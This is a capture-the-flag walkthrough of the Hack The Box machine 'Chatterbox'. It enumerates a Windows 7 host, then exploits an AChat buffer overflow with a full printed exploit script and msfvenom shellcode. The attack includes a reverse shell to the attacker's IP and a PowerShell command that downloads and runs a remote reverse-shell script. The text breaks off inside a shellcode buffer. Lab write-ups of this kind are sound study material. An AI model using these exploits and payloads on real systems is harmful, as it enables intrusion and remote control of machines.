Summary
Chatterbox involves exploiting a Windows 7 system. Initial enumeration reveals the AChat service (port 9256) vulnerable to a remote buffer overflow (CVE-2015-1578). Using a public exploit, a reverse shell is gained as user Alfred. Privilege escalation is achieved by discovering the Administrator’s plaintext password, Welcome1!, in the Windows Registry (HKLM\...\Winlogon). This credential allows executing Impacket-psexec to gain SYSTEM access. Alternatively, modifying file permissions via icacls or using RunasCs provides root flag access.
Nmap
```
└─# nmap -p- --min-rate 10000 --max-retries 1 $box -Pn -oA nmap/port-scan
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-10 23:15 IST
Warning: 10.10.10.74 giving up on port because retransmission cap hit (1).
Nmap scan report for 10.10.10.74
Host is up (0.28s latency).
Not shown: 47871 closed tcp ports (reset), 17653 filtered tcp ports (no-response)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
9255/tcp  open  mon
9256/tcp  open  unknown
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 11.31 seconds
```
```
└─# nmap -sC -sV -p135,139,445,9255,9256,49152,49153,49154,49155,49156,49157 $box -Pn -oA nmap/scripts
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-10 23:18 IST
Nmap scan report for 10.10.10.74
Host is up (0.58s latency).

PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
9255/tcp  open  http         AChat chat system httpd
|_http-title: Site doesn't have a title.
|_http-server-header: AChat
9256/tcp  open  achat        AChat chat system
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: CHATTERBOX; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Chatterbox
|   NetBIOS computer name: CHATTERBOX\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-01-10T17:49:27-05:00
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled but not required
|_clock-skew: mean: 6h40m01s, deviation: 2h53m15s, median: 4h59m59s
| smb2-time:
|   date: 2025-01-10T22:49:24
|_  start_date: 2025-01-10T08:47:15
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.36 seconds
```
SMB - 139,445
```
└─# smbclient -L $box
Password for [WORKGROUP\root]:
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.74 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```
AChat - 9255,9256
```
└─# searchsploit achat
--------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                         |  Path
--------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Achat 0.150 beta7 - Remote Buffer Overflow                                                                                             | windows/remote/36025.py
Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit)                                                                                | windows/remote/36056.rb
MataChat - 'input.php' Multiple Cross-Site Scripting Vulnerabilities                                                                   | php/webapps/32958.txt
Parachat 5.5 - Directory Traversal                                                                                                     | php/webapps/24647.txt
--------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```
Now let’s copy the Remote Buffer Overflow exploit code locally:
```
└─# searchsploit -m windows/remote/36025.py
  Exploit: Achat 0.150 beta7 - Remote Buffer Overflow
      URL: https://www.exploit-db.com/exploits/36025
     Path: /usr/share/exploitdb/exploits/windows/remote/36025.py
    Codes: CVE-2015-1578, CVE-2015-1577, OSVDB-118206, OSVDB-118104
 Verified: False
File Type: Python script, ASCII text executable, with very long lines (637)
Copied to: /root/htb/chatterbox/36025.py
```
```python
#!/usr/bin/python
# Author KAhara MAnhara
# Achat 0.150 beta7 - Buffer Overflow
# Tested on Windows 7 32bit
# Python 2 script (print statement, str payload): run it with python2.
import socket
import sys, time

# msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
#Payload size: 512 bytes
buf = ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x69\x6c\x77\x78\x62\x62"
buf += "\x69\x70\x59\x70\x4b\x50\x73\x30\x43\x59\x5a\x45\x50"
buf += "\x31\x67\x50\x4f\x74\x34\x4b\x50\x50\x4e\x50\x34\x4b"
buf += "\x30\x52\x7a\x6c\x74\x4b\x70\x52\x4e\x34\x64\x4b\x63"
buf += "\x42\x4f\x38\x4a\x6f\x38\x37\x6d\x7a\x4d\x56\x4d\x61"
buf += "\x49\x6f\x74\x6c\x4f\x4c\x6f\x71\x33\x4c\x69\x72\x4e"
buf += "\x4c\x4f\x30\x66\x61\x58\x4f\x5a\x6d\x59\x71\x67\x57"
buf += "\x68\x62\x48\x72\x52\x32\x50\x57\x54\x4b\x72\x32\x4e"
buf += "\x30\x64\x4b\x6e\x6a\x4d\x6c\x72\x6b\x70\x4c\x4a\x71"
buf += "\x43\x48\x39\x53\x71\x38\x6a\x61\x36\x71\x4f\x61\x62"
buf += "\x6b\x42\x39\x4f\x30\x4a\x61\x38\x53\x62\x6b\x30\x49"
buf += "\x6b\x68\x58\x63\x4e\x5a\x6e\x69\x44\x4b\x6f\x44\x72"
buf += "\x6b\x4b\x51\x36\x76\x70\x31\x69\x6f\x46\x4c\x57\x51"
buf += "\x48\x4f\x4c\x4d\x6a\x61\x55\x77\x4f\x48\x57\x70\x54"
buf += "\x35\x49\x66\x49\x73\x51\x6d\x7a\x58\x6d\x6b\x53\x4d"
buf += "\x4e\x44\x34\x35\x38\x64\x62\x38\x62\x6b\x52\x38\x6b"
buf += "\x74\x69\x71\x4a\x33\x33\x36\x54\x4b\x7a\x6c\x6e\x6b"
buf += "\x72\x6b\x51\x48\x6d\x4c\x6b\x51\x67\x63\x52\x6b\x49"
buf += "\x74\x72\x6b\x4d\x31\x7a\x30\x44\x49\x51\x34\x6e\x44"
buf += "\x4b\x74\x61\x4b\x51\x4b\x4f\x71\x51\x49\x71\x4a\x52"
buf += "\x31\x49\x6f\x69\x50\x31\x4f\x51\x4f\x6e\x7a\x34\x4b"
buf += "\x6a\x72\x38\x6b\x44\x4d\x71\x4d\x50\x6a\x59\x71\x64"
buf += "\x4d\x35\x35\x65\x62\x4b\x50\x49\x70\x4b\x50\x52\x30"
buf += "\x32\x48\x6c\x71\x64\x4b\x72\x4f\x51\x77\x59\x6f\x79"
buf += "\x45\x45\x6b\x48\x70\x75\x65\x35\x52\x30\x56\x72\x48"
buf += "\x33\x76\x35\x45\x37\x4d\x63\x6d\x49\x6f\x37\x65\x6d"
buf += "\x6c\x6a\x66\x31\x6c\x79\x7a\x51\x70\x4b\x4b\x67\x70"
buf += "\x53\x45\x6d\x35\x55\x6b\x31\x37\x4e\x33\x32\x52\x30"
buf += "\x6f\x42\x4a\x6d\x30\x50\x53\x79\x6f\x37\x65\x70\x63"
buf += "\x53\x31\x72\x4c\x30\x63\x4c\x6e\x70\x65\x32\x58\x50"
buf += "\x65\x6d\x30\x41\x41"

# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Target host and AChat port as shipped in the original exploit
server_address = ('192.168.91.130', 9256)

fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
p = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40"
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
p += buf + "A" * (1152 - len(buf))
p += "\x00" + "A"*10 + "\x00"

print "---->{P00F}!"

# Send the message in 8192-byte datagrams, pausing once most of it is out
i=0
while i<len(p):
    if i > 172000:
        time.sleep(1.0)
    sent = sock.sendto(p[i:(i+8192)], server_address)
    i += sent

sock.close()
```
```
└─# msfvenom -a x86 --platform Windows -p windows/exec CMD='ping 10.10.16.6' -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 526 (iteration=0)
x86/unicode_mixed chosen with final size 526
Payload size: 526 bytes
Final size of python file: 2599 bytes
buf =  b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51"
buf += b"\x41\x44\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x51\x41\x49\x41\x68"
buf += b"\x41\x41\x41\x5a\x31\x41\x49\x41\x49\x41\x4a\x31"
buf += b"\x31\x41\x49\x41\x49\x41\x42\x41\x42\x41\x42\x51"
buf += b"\x49\x31\x41\x49\x51\x49\x41\x49\x51\x49\x31\x31"
buf += b"\x31\x41\x49\x41\x4a\x51\x59\x41\x5a\x42\x41\x42"
buf += b"\x41\x42\x41\x42\x41\x42\x6b\x4d\x41\x47\x42\x39"
buf += b"\x75\x34\x4a\x42\x59\x6c\x57\x78\x71\x72\x4d\x30"
buf += b"\x4d\x30\x59\x70\x33\x30\x71\x79\x79\x55\x6d\x61"
buf += b"\x57\x50\x70\x64\x52\x6b\x32\x30\x50\x30\x72\x6b"
buf += b"\x50\x52\x7a\x6c\x34\x4b\x31\x42\x4a\x74\x42\x6b"
buf += b"\x52\x52\x6b\x78\x5a\x6f\x56\x57\x4f\x5a\x4c\x66"
buf += b"\x6d\x61\x4b\x4f\x74\x6c\x4f\x4c\x61\x51\x33\x4c"
buf += b"\x79\x72\x6e\x4c\x4d\x50\x75\x71\x46\x6f\x7a\x6d"
buf += b"\x69\x71\x39\x37\x6b\x32\x68\x72\x51\x42\x6e\x77"
buf += b"\x54\x4b\x4e\x72\x4e\x30\x52\x6b\x6d\x7a\x6d\x6c"
buf += b"\x52\x6b\x50\x4c\x4e\x31\x73\x48\x78\x63\x70\x48"
buf += b"\x49\x71\x38\x51\x72\x31\x42\x6b\x4f\x69\x6b\x70"
buf += b"\x7a\x61\x47\x63\x34\x4b\x31\x39\x4a\x78\x4a\x43"
buf += b"\x6e\x5a\x6d\x79\x54\x4b\x30\x34\x34\x4b\x59\x71"
buf += b"\x77\x66\x6c\x71\x4b\x4f\x36\x4c\x49\x31\x78\x4f"
buf += b"\x7a\x6d\x59\x71\x37\x57\x6c\x78\x37\x70\x70\x75"
buf += b"\x4b\x46\x4c\x43\x71\x6d\x79\x68\x4f\x4b\x53\x4d"
buf += b"\x6c\x64\x51\x65\x4b\x34\x31\x48\x32\x6b\x30\x58"
buf += b"\x6b\x74\x6a\x61\x67\x63\x4f\x76\x52\x6b\x7a\x6c"
buf += b"\x30\x4b\x74\x4b\x30\x58\x6b\x6c\x5a\x61\x7a\x33"
buf += b"\x42\x6b\x69\x74\x52\x6b\x39\x71\x7a\x30\x43\x59"
buf += b"\x61\x34\x4c\x64\x4d\x54\x6f\x6b\x4f\x6b\x33\x31"
buf += b"\x72\x39\x6f\x6a\x52\x31\x79\x6f\x37\x70\x61\x4f"
buf += b"\x31\x4f\x4e\x7a\x42\x6b\x4a\x72\x5a\x4b\x34\x4d"
buf += b"\x61\x4d\x31\x5a\x6a\x61\x44\x4d\x35\x35\x45\x62"
buf += b"\x4d\x30\x39\x70\x79\x70\x32\x30\x30\x68\x6e\x51"
buf += b"\x34\x4b\x62\x4f\x55\x37\x49\x6f\x67\x65\x77\x4b"
buf += b"\x4a\x50\x57\x45\x47\x32\x51\x46\x30\x68\x75\x56"
buf += b"\x64\x55\x57\x4d\x73\x6d\x59\x6f\x57\x65\x6d\x6c"
buf += b"\x39\x76\x51\x6c\x59\x7a\x33\x50\x39\x6b\x69\x50"
buf += b"\x50\x75\x59\x75\x67\x4b\x70\x47\x4c\x53\x50\x72"
buf += b"\x52\x4f\x61\x5a\x4d\x30\x72\x33\x4b\x4f\x76\x75"
buf += b"\x50\x70\x62\x49\x52\x4e\x72\x47\x6f\x30\x30\x31"
buf += b"\x4e\x50\x4e\x4e\x4e\x51\x4c\x70\x6c\x6e\x4e\x51"
buf += b"\x4d\x66\x4e\x4e\x4e\x56\x6b\x50\x41\x41"
```
Now we replace the buf definition in our copy of the exploit script, rbo.py, with this newly generated payload and run it:
```
└─# python2 rbo.py
---->{P00F}!
```
```
└─# tcpdump -ni tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
02:36:10.628464 IP 10.10.10.74 > 10.10.16.6: ICMP echo request, id 1, seq 5, length 40
02:36:10.628506 IP 10.10.16.6 > 10.10.10.74: ICMP echo reply, id 1, seq 5, length 40
02:36:11.596465 IP 10.10.10.74 > 10.10.16.6: ICMP echo request, id 1, seq 6, length 40
02:36:11.596498 IP 10.10.16.6 > 10.10.10.74: ICMP echo reply, id 1, seq 6, length 40
02:36:12.595055 IP 10.10.10.74 > 10.10.16.6: ICMP echo request, id 1, seq 7, length 40
02:36:12.595094 IP 10.10.16.6 > 10.10.10.74: ICMP echo reply, id 1, seq 7, length 40
02:36:13.698852 IP 10.10.10.74 > 10.10.16.6: ICMP echo request, id 1, seq 8, length 40
02:36:13.698906 IP 10.10.16.6 > 10.10.10.74: ICMP echo reply, id 1, seq 8, length 40
```
The tcpdump capture shows ICMP echo requests arriving from the target machine, so the injected ping command ran on the host. We can conclude that the AChat application is vulnerable to the Remote Buffer Overflow.
Reverse shell
```
└─# msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.16.6 LPORT=443 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 774 (iteration=0)
x86/unicode_mixed chosen with final size 774
Payload size: 774 bytes
Final size of python file: 3822 bytes
buf =  b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51"
buf += b"\x41\x44\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x51\x41\x49\x41\x68"
buf += b"\x41\x41\x41\x5a\x31\x41\x49\x41\x49\x41\x4a\x31"
buf += b"\x31\x41\x49\x41\x49\x41\x42\x41\x42\x41\x42\x51"
buf += b"\x49\x31\x41\x49\x51\x49\x41\x49\x51\x49\x31\x31"
buf += b"\x31\x41\x49\x41\x4a\x51\x59\x41\x5a\x42\x41\x42"
buf += b"\x41\x42\x41\x42\x41\x42\x6b\x4d\x41\x47\x42\x39"
buf += b"\x75\x34\x4a\x42\x79\x6c\x79\x58\x53\x52\x4b\x50"
buf += b"\x4b\x50\x39\x70\x51\x50\x43\x59\x48\x65\x4c\x71"
buf += b"\x57\x50\x61\x54\x52\x6b\x6e\x70\x6c\x70\x74\x4b"
buf += b"\x4f\x62\x6a\x6c\x52\x6b\x52\x32\x4c\x54\x72\x6b"
buf += b"\x34\x32\x6f\x38\x6a\x6f\x66\x57\x6d\x7a\x4b\x76"
buf += b"\x70\x31\x69\x6f\x66\x4c\x6d\x6c\x31\x51\x71\x6c"
buf += b"\x6a\x62\x6e\x4c\x4f\x30\x49\x31\x68\x4f\x4c\x4d"
buf += b"\x7a\x61\x47\x57\x49\x52\x4a\x52\x4f\x62\x6e\x77"
buf += b"\x52\x6b\x6e\x72\x6e\x30\x42\x6b\x50\x4a\x6d\x6c"
buf += b"\x42\x6b\x30\x4c\x6a\x71\x54\x38\x37\x73\x51\x38"
buf += b"\x4b\x51\x57\x61\x4f\x61\x42\x6b\x4f\x69\x4d\x50"
buf += b"\x6a\x61\x38\x53\x52\x6b\x4d\x79\x6c\x58\x47\x73"
buf += b"\x4c\x7a\x4d\x79\x74\x4b\x4f\x44\x74\x4b\x7a\x61"
buf += b"\x56\x76\x6c\x71\x69\x6f\x46\x4c\x35\x71\x66\x6f"
buf += b"\x6a\x6d\x39\x71\x58\x47\x4c\x78\x37\x70\x43\x45"
buf += b"\x68\x76\x7a\x63\x71\x6d\x4b\x48\x4d\x6b\x33\x4d"
buf += b"\x4c\x64\x70\x75\x37\x74\x70\x58\x32\x6b\x52\x38"
buf += b"\x4d\x54\x5a\x61\x47\x63\x70\x66\x54\x4b\x6c\x4c"
buf += b"\x30\x4b\x74\x4b\x70\x58\x6b\x6c\x69\x71\x78\x53"
buf += b"\x52\x6b\x4a\x64\x74\x4b\x6d\x31\x58\x50\x73\x59"
buf += b"\x4e\x64\x6f\x34\x6d\x54\x6f\x6b\x31\x4b\x31\x51"
buf += b"\x61\x49\x51\x4a\x30\x51\x69\x6f\x57\x70\x71\x4f"
buf += b"\x4f\x6f\x50\x5a\x42\x6b\x6a\x72\x6a\x4b\x52\x6d"
buf += b"\x4f\x6d\x71\x58\x70\x33\x6f\x42\x49\x70\x4b\x50"
buf += b"\x61\x58\x62\x57\x61\x63\x30\x32\x31\x4f\x61\x44"
buf += b"\x6f\x78\x4e\x6c\x70\x77\x4f\x36\x4d\x37\x69\x6f"
buf += b"\x68\x55\x76\x58\x52\x70\x39\x71\x4b\x50\x39\x70"
buf += b"\x4d\x59\x77\x54\x50\x54\x4e\x70\x33\x38\x6d\x59"
buf += b"\x71\x70\x42\x4b\x6d\x30\x79\x6f\x48\x55\x52\x30"
buf += b"\x72\x30\x42\x30\x4e\x70\x31\x30\x70\x50\x61\x30"
buf += b"\x72\x30\x32\x48\x38\x6a\x6c\x4f\x37\x6f\x57\x70"
buf += b"\x4b\x4f\x57\x65\x72\x77\x32\x4a\x4d\x35\x70\x68"
buf += b"\x79\x7a\x39\x7a\x6e\x30\x4a\x66\x43\x38\x4d\x32"
buf += b"\x59\x70\x4a\x61\x65\x6b\x62\x69\x47\x76\x42\x4a"
buf += b"\x4c\x50\x6e\x76\x6e\x77\x71\x58\x54\x59\x37\x35"
buf += b"\x30\x74\x73\x31\x69\x6f\x46\x75\x55\x35\x79\x30"
buf += b"\x74\x34\x6c\x4c\x4b\x4f\x4e\x6e\x6c\x48\x33\x45"
buf += b"\x4a\x4c\x6f\x78\x38\x70\x74\x75\x56\x42\x72\x36"
buf += b"\x79\x6f\x6a\x35\x72\x48\x73\x33\x70\x6d\x4f\x74"
buf += b"\x4b\x50\x54\x49\x4a\x43\x72\x37\x4f\x67\x31\x47"
buf += b"\x6c\x71\x49\x66\x72\x4a\x6c\x52\x32\x39\x6f\x66"
buf += b"\x5a\x42\x39\x6d\x31\x56\x48\x47\x31\x34\x6e\x44"
buf += b"\x6f\x4c\x6b\x51\x4b\x51\x64\x4d\x6d\x74\x4b\x74"
buf += b"\x7a\x70\x55\x76\x6d\x30\x70\x44\x61\x44\x30\x50"
buf += b"\x6f\x66\x31\x46\x50\x56\x4f\x56\x31\x46\x70\x4e"
buf += b"\x51\x46\x32\x36\x6e\x73\x51\x46\x73\x38\x50\x79"
buf += b"\x46\x6c\x4d\x6f\x64\x46\x69\x6f\x68\x55\x71\x79"
buf += b"\x57\x70\x30\x4e\x30\x56\x61\x36\x79\x6f\x30\x30"
buf += b"\x50\x68\x6c\x48\x52\x67\x4d\x4d\x53\x30\x79\x6f"
buf += b"\x37\x65\x35\x6b\x58\x70\x58\x35\x36\x42\x61\x46"
buf += b"\x30\x68\x74\x66\x46\x35\x35\x6d\x43\x6d\x39\x6f"
buf += b"\x6a\x35\x4f\x4c\x4c\x46\x53\x4c\x79\x7a\x35\x30"
buf += b"\x59\x6b\x77\x70\x34\x35\x39\x75\x37\x4b\x30\x47"
buf += b"\x5a\x73\x43\x42\x70\x6f\x31\x5a\x69\x70\x52\x33"
buf += b"\x49\x6f\x49\x45\x41\x41"
```
```
└─# python2 rbo.py
---->{P00F}!
```
```
└─# rlwrap nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.10.74] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
chatterbox\alfred
```
Let’s get the user flag:
```
C:\Users\Alfred\Desktop>type user.txt
type user.txt
d5b2xxxxxxxxxxxxxxxxxxxxxxxxxxxx
```
Nishang PowerShell
Make sure the line below is appended to the end of the Nishang script (Invoke-PowerShellTcp.ps1), so that the function is invoked as soon as the script is loaded:
```
└─# cat Invoke-PowerShellTcp.ps1 | tail -n 2

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.6 -Port 443
```
Update the rbo.py script with a payload that downloads and runs that script:
```
└─# msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell -c iex(new-object net.webclient).downloadstring('http://10.10.16.6/Invoke-PowerShellTcp.ps1')" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 704 (iteration=0)
x86/unicode_mixed chosen with final size 704
Payload size: 704 bytes
Final size of python file: 3476 bytes
buf =  b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51"
buf += b"\x41\x44\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x51\x41\x49\x41\x68"
buf += b"\x41\x41\x41\x5a\x31\x41\x49\x41\x49\x41\x4a\x31"
buf += b"\x31\x41\x49\x41\x49\x41\x42\x41\x42\x41\x42\x51"
buf += b"\x49\x31\x41\x49\x51\x49\x41\x49\x51\x49\x31\x31"
buf += b"\x31\x41\x49\x41\x4a\x51\x59\x41\x5a\x42\x41\x42"
buf += b"\x41\x42\x41\x42\x41\x42\x6b\x4d\x41\x47\x42\x39"
buf += b"\x75\x34\x4a\x42\x49\x6c\x4a\x48\x62\x62\x39\x70"
buf += b"\x39\x70\x6d\x30\x61\x50\x43\x59\x79\x55\x6c\x71"
buf += b"\x79\x30\x71\x54\x62\x6b\x50\x50\x6e\x50\x44\x4b"
buf += b"\x4e\x72\x4c\x4c\x54\x4b\x4e\x72\x6d\x44\x42\x6b"
buf += b"\x64\x32\x6b\x78\x4a\x6f\x47\x47\x6d\x7a\x6f\x36"
buf += b"\x4e\x51\x4b\x4f\x46\x4c\x6d\x6c\x6f\x71\x53\x4c"
buf += b"\x4c\x42\x6e\x4c\x4b\x70\x77\x51\x68\x4f\x7a\x6d"
buf += b"\x69\x71\x76\x67\x47\x72\x4c\x32\x4f\x62\x6f\x67"
buf += b"\x52\x6b\x4f\x62\x7a\x70\x64\x4b\x50\x4a\x6d\x6c"
buf += b"\x64\x4b\x70\x4c\x6c\x51\x33\x48\x37\x73\x6f\x58"
buf += b"\x69\x71\x37\x61\x70\x51\x54\x4b\x61\x49\x6f\x30"
buf += b"\x79\x71\x4a\x33\x64\x4b\x4d\x79\x7a\x78\x59\x53"
buf += b"\x4e\x5a\x51\x39\x42\x6b\x70\x34\x64\x4b\x59\x71"
buf += b"\x4a\x36\x6e\x51\x69\x6f\x44\x6c\x45\x71\x56\x6f"
buf += b"\x5a\x6d\x69\x71\x77\x57\x6d\x68\x59\x50\x31\x65"
buf += b"\x39\x66\x49\x73\x51\x6d\x78\x78\x6f\x4b\x43\x4d"
buf += b"\x6f\x34\x70\x75\x4a\x44\x51\x48\x52\x6b\x30\x58"
buf += b"\x4c\x64\x6b\x51\x6a\x33\x32\x46\x72\x6b\x6a\x6c"
buf += b"\x70\x4b\x54\x4b\x4f\x68\x4d\x4c\x6b\x51\x48\x53"
buf += b"\x64\x4b\x59\x74\x42\x6b\x59\x71\x38\x50\x51\x79"
